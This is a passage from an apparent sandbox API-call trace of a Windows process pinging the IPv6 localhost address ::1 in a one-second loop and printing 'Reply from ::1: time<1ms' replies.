lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0134.808] CharToOemBuffA (in: lpszSrc="time=5ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time=5ms ") returned 1 [0134.808] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.808] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0134.808] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.808] LocalFree (hMem=0x4a29e8) returned 0x0 [0134.809] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0134.809] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0134.809] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0134.809] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0134.809] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0134.809] LocalFree (hMem=0x4a8f68) returned 0x0 [0134.809] Sleep (dwMilliseconds=0x3e3) [0135.852] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0135.876] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0135.876] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0135.876] CharToOemBuffA 
(in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0135.876] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.876] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0135.876] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.876] LocalFree (hMem=0x4a51b8) returned 0x0 [0135.876] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0135.877] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0135.877] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.877] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0135.877] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.877] LocalFree (hMem=0x4a29e8) returned 0x0 [0135.877] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0135.877] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0135.877] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.877] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0135.877] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.877] LocalFree (hMem=0x4a8f68) returned 0x0 [0135.877] Sleep (dwMilliseconds=0x3e8) [0136.899] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0137.002] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, 
sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0137.002] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0137.003] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0137.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.003] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0137.003] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.003] LocalFree (hMem=0x4a51b8) returned 0x0 [0137.003] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0137.003] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0137.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.003] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0137.003] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.003] LocalFree (hMem=0x4a29e8) returned 0x0 [0137.003] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0137.003] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0137.003] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.003] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0137.003] _setmode 
(_FileHandle=1, _Mode=16384) returned 32768 [0137.003] LocalFree (hMem=0x4a8f68) returned 0x0 [0137.003] Sleep (dwMilliseconds=0x3e8) [0138.017] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0138.103] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0138.103] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0138.103] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0138.103] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.103] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0138.103] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.103] LocalFree (hMem=0x4a51b8) returned 0x0 [0138.103] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0138.103] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0138.103] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.103] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0138.104] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.104] LocalFree (hMem=0x4a29e8) 
returned 0x0 [0138.104] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0138.104] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0138.104] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.104] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0138.104] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.104] LocalFree (hMem=0x4a8f68) returned 0x0 [0138.104] Sleep (dwMilliseconds=0x3e8) [0139.173] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0139.247] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0139.247] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0139.247] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0139.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.247] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0139.247] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.247] LocalFree (hMem=0x4a51b8) returned 0x0 [0139.247] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, 
dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0139.247] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0139.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.247] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0139.247] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.247] LocalFree (hMem=0x4a29e8) returned 0x0 [0139.247] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0139.247] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0139.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.247] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0139.248] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.248] LocalFree (hMem=0x4a8f68) returned 0x0 [0139.248] Sleep (dwMilliseconds=0x3e8) [0140.868] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0141.270] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0141.270] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 
[0141.270] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0141.270] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.270] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0141.271] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.271] LocalFree (hMem=0x4a51b8) returned 0x0 [0141.271] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0141.271] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0141.271] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.272] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0141.272] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.272] LocalFree (hMem=0x4a29e8) returned 0x0 [0141.272] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0141.272] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0141.272] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.272] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0141.272] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.272] LocalFree (hMem=0x4a8f68) returned 0x0 [0141.272] Sleep (dwMilliseconds=0x3e8) [0142.469] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0142.803] getnameinfo (in: 
pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0142.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0142.803] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0142.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.803] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0142.803] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.803] LocalFree (hMem=0x4a51b8) returned 0x0 [0142.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0142.803] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0142.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.803] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0142.804] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.804] LocalFree (hMem=0x4a29e8) returned 0x0 [0142.804] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0142.804] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0142.804] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.804] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) 
returned 2 [0142.804] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.804] LocalFree (hMem=0x4a8f68) returned 0x0 [0142.804] Sleep (dwMilliseconds=0x3e8) [0143.936] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0144.113] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0144.113] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0144.113] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0144.113] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.113] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0144.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.114] LocalFree (hMem=0x4a51b8) returned 0x0 [0144.114] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0144.114] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0144.114] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.114] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0144.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.114] 
LocalFree (hMem=0x4a29e8) returned 0x0 [0144.114] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0144.114] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0144.114] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.114] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0144.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.114] LocalFree (hMem=0x4a8f68) returned 0x0 [0144.114] Sleep (dwMilliseconds=0x3e8) [0145.194] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0145.304] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0145.304] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0145.304] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0145.304] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.304] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0145.304] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.304] LocalFree (hMem=0x4a51b8) returned 0x0 [0145.304] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, 
dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0145.304] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0145.304] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.304] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0145.305] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.305] LocalFree (hMem=0x4a29e8) returned 0x0 [0145.305] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0145.305] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0145.305] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0145.305] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0145.305] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0145.305] LocalFree (hMem=0x4a8f68) returned 0x0 [0145.305] Sleep (dwMilliseconds=0x3e8) [0146.435] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0146.631] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0146.631] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") 
returned 0x10 [0146.631] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0146.631] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.631] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0146.632] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.632] LocalFree (hMem=0x4a51b8) returned 0x0 [0146.632] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0146.632] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0146.632] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.632] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0146.632] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.632] LocalFree (hMem=0x4a29e8) returned 0x0 [0146.632] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0146.632] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0146.632] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0146.632] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0146.633] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0146.633] LocalFree (hMem=0x4a8f68) returned 0x0 [0146.633] Sleep (dwMilliseconds=0x3e8) [0147.710] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0147.793] 
